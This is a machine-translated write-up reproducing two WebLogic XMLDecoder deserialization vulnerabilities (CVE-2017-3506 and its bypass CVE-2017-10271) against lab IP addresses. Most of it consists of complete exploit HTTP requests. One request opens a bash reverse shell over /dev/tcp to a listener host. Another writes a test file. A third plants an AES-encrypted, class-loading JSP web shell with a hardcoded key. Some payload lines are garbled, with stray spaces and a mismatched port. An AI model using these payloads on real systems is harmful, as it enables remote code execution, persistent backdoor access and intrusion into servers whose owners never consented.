Weblogic Vulnerability Reappearance
Article directory
- Weblogic vulnerability reproduction
-
- WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-3506)
-
- principle
- Affected version
- recurrent
- Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability
-
- principle
- Affected version
- recurrent
WebLogic XMLDecoder deserialization vulnerability (CVE-2017-3506)
Principle
It was revealed on the Internet that the WLS component of weblogic has an xmldecoder deserialization vulnerability, and the xml data package constructed by posting directly can be rce.
Affects version
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.
Recurrence
There may be a vulnerability path /wls-wsat/CoordinatorPortType, /wls-wsat/RegistrationPortTypeRPC, /wls-wsat/ParticipantPortType, /wls-wsat/RegistrationRequesterPortType, /wls-wsat/CoordinatorPortType11, /wls-wsat/RegistrationPortTypeRPC11, /wls-wsat/ParticipantPortType11, /wls-wsat/RegistrationRequesterPortType11
Visit http://192.168.190.136:7001/wls-wsat/RegistrationRequesterPortType , and the response shows that Web Services proves the existence of the vulnerability.
Execute reverse shell command
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: 192.168.190.136:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: text/xml Content-Length: 841 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java. lang. ProcessBuilder"> <array class="java. lang. String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i > & /dev/tcp/192.168.190.1/44440 > &1</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
nc listens on port 4444 to receive bash shell
Weblogic < 10.3.6 'wls-wsat' XMLDecoder deserialization vulnerability
Principle
CVE-2017-10271 is a patch bypass for CVE-2017-3506, replacing object with void.
Affects version
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0.
Recurrence
Visit http://192.168.0.131:7001/wls-wsat/CoordinatorPortType and respond with Web Services to prove the existence of the vulnerability
Use the POST method to send specific xml data to implement various command execution.
Try to write to the file
Request Packet
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.0.131:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: text/xml Content-Length: 705 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.6.0" class="java.beans.XMLDecoder"> <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"> <string>xmldecoder_vul_test11</string></void><void method="close"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
Return 500, successful execution
Write shell
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.190.131:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: text/xml Content-Length: 1154 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/zy.jsp</string> <void method="println"><string> <![CDATA[ <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c); }public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="b8a7336f1f7528e1";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(), "AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())) ).newInstance().equals(pageContext);}%> ]]> </string> </void> <void method="close"/> </void></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>